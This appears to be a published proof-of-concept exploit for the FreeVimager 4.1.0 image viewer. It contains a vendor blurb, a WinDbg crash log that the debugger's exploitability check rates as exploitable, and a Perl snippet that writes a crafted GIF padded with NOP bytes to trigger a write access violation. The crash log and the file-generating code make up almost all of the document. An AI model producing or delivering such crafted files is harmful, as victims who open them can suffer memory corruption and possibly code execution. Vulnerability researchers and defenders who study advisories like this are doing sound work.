#!/usr/bin/perl
FreeVimager 4.1.0 <= WriteAV Arbitrary Code Execution
Vendor Decription:
This is a Free & Fast Image Viewer and Editor for Windows. It can as well play avi video files,
ordinary audio files and audio CDs. There are many tools around doing that, but the aim of this
Freeware is to be a small and handy tool doing what it says and running also as a standalone
exe file (installer not necessary).
Debug info:
Microsoft (R) Windows Debugger Version 6.11.0001.404 X86
Copyright (c) Microsoft Corporation. All rights reserved.
CommandLine: "C:\Program Files\FreeVimager\FreeVimager.exe" C:\research\FreeVimager\crafted.gif
Symbol search path is: *** Invalid***
****************************************************************************
* Symbol loading may be unreliable without a symbol search path. *
* Use .symfix to have the debugger choose a symbol path. *
* After setting your symbol path, use .reload to refresh symbol locations. *
****************************************************************************
Executable search path is:
ModLoad: 00400000 00c9a000 image00400000
ModLoad: 7c900000 7c9b2000 ntdll.dll
ModLoad: 7c800000 7c8f6000 C:\WINDOWS\system32\kernel32.dll
ModLoad: 7e410000 7e4a1000 C:\WINDOWS\system32\USER32.dll
ModLoad: 77f10000 77f59000 C:\WINDOWS\system32\GDI32.dll
ModLoad: 763b0000 763f9000 C:\WINDOWS\system32\COMDLG32.dll
ModLoad: 77dd0000 77e6b000 C:\WINDOWS\system32\ADVAPI32.dll
ModLoad: 77e70000 77f03000 C:\WINDOWS\system32\RPCRT4.dll
ModLoad: 77fe0000 77ff1000 C:\WINDOWS\system32\Secur32.dll
ModLoad: 773d0000 774d3000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\COMCTL32.dll
ModLoad: 77c10000 77c68000 C:\WINDOWS\system32\msvcrt.dll
ModLoad: 77f60000 77fd6000 C:\WINDOWS\system32\SHLWAPI.dll
ModLoad: 7c9c0000 7d1d7000 C:\WINDOWS\system32\SHELL32.dll
ModLoad: 73000000 73026000 C:\WINDOWS\system32\WINSPOOL.DRV
ModLoad: 7df70000 7df92000 C:\WINDOWS\system32\oledlg.dll
ModLoad: 774e0000 7761e000 C:\WINDOWS\system32\ole32.dll
ModLoad: 77120000 771ab000 C:\WINDOWS\system32\OLEAUT32.dll
ModLoad: 75a70000 75a91000 C:\WINDOWS\system32\MSVFW32.dll
ModLoad: 76b40000 76b6d000 C:\WINDOWS\system32\WINMM.dll
ModLoad: 77be0000 77bf5000 C:\WINDOWS\system32\MSACM32.dll
ModLoad: 77c00000 77c08000 C:\WINDOWS\system32\VERSION.dll
ModLoad: 3d930000 3da16000 C:\WINDOWS\system32\WININET.dll
ModLoad: 00340000 00349000 C:\WINDOWS\system32\Normaliz.dll
ModLoad: 78130000 78263000 C:\WINDOWS\system32\urlmon.dll
ModLoad: 3dfd0000 3e1bb000 C:\WINDOWS\system32\iertutil.dll
(e48.568): Break instruction exception - code 80000003 (first chance)
ModLoad: 76390000 763ad000 C:\WINDOWS\system32\IMM32.DLL
ModLoad: 5ad70000 5ada8000 C:\WINDOWS\system32\uxtheme.dll
ModLoad: 74720000 7476c000 C:\WINDOWS\system32\MSCTF.dll
ModLoad: 755c0000 755ee000 C:\WINDOWS\system32\msctfime.ime
ModLoad: 76f50000 76f58000 C:\WINDOWS\system32\Wtsapi32.dll
ModLoad: 76360000 76370000 C:\WINDOWS\system32\WINSTA.dll
ModLoad: 5b860000 5b8b5000 C:\WINDOWS\system32\NETAPI32.dll
ModLoad: 73bc0000 73bc6000 C:\WINDOWS\system32\DCIMAN32.DLL
ModLoad: 76380000 76385000 C:\WINDOWS\system32\msimg32.dll
(e48.568): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00008080 ebx=00000000 ecx=0151c14c edx=08000004 esi=00000002 edi=00008080
eip=005c02c3 esp=0012ea58 ebp=0151a008 iopl=0 nv up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210216
*** WARNING: Unable to verify checksum for image00400000
*** ERROR: Module load completed but symbols could not be loaded for image00400000
image00400000+0x1c02c3:
005c02c3 897c91f8 mov dword ptr [ecx+edx*4-8],edi ds:0023:2151c154=???
0:000> r;!exploitable -v;q
eax=00008080 ebx=00000000 ecx=0151c14c edx=08000004 esi=00000002 edi=00008080
eip=005c02c3 esp=0012ea58 ebp=0151a008 iopl=0 nv up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210216
image00400000+0x1c02c3:
005c02c3 897c91f8 mov dword ptr [ecx+edx*4-8],edi ds:0023:2151c154=???
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
*** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\kernel32.dll -
Exception Faulting Address: 0x2151c154
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Write Access Violation
Exception Hash (Major/Minor): 0x50747228.0x58333273
Stack Trace:
image00400000+0x1c02c3
image00400000+0x1bfd07
image00400000+0x18abb4
kernel32!VirtualAllocEx+0x47
kernel32!VirtualAlloc+0x18
image00400000+0x18a0ef
image00400000+0x18a121
image00400000+0x24fb01
image00400000+0x24fc4e
image00400000+0x23be55
image00400000+0x95a48
image00400000+0x4fd8
image00400000+0xf054e
image00400000+0xea85e
ntdll!RtlFreeHeap+0x130
ntdll!RtlFreeHeap+0x130
kernel32!CreateActCtxW+0xb6c
kernel32!CreateActCtxW+0xcbf
Instruction Address: 0x00000000005c02c3
Proof of Concept:
my $crafted = "\x47\x49\x46\x38\x39\x61\x18\x00\x18\x00\xC4\x00\x00\xA2\xC5".
"\xE1\xEB\xF3\xF9\x8C\xB8\xDA\x49\x8E\xC3\x95\xBD\xDC\xFE\xFE".
"\xFF\x75\xAA\xD3\x38\x84\xBE\xD5\xE5\xF1\x5D\x9A\xCA\x26\x78".
"\xB8\x22\x76\xB7\xC4\xDA\xEC\xDD\xEA\xF4\x55\x96\xC8\xF4\xF8".
"\xFC\x89\xB5\xD8\xF1\xF6\xFA\x28\x79\xB8\x87\xB5\xD8\x31\x7F".
"\xBC\x23\x77\xB8\x9E\xC3\xE0\x9E\xC3\xDF\x68\xA1\xCE\xE6\xF0".
"\xF7\xFA\xFC\xFD\x1F\x74\xB6\x8E\xB9\xDA\xFF\xFF\xFF\x1E\x73".
"\xB5\x1E\x74\xB6\x21\xF9\x04\x00\x00\x00\x00\x00\x2C\x00\x00".
"\x00\x00\x18\x00\x18\x00\x00\xFB\x05\x60";
my $junk = "\x90" x 163;
open(C, ">:raw", "crafted.gif");
print C $crafted.$junk;
close(C);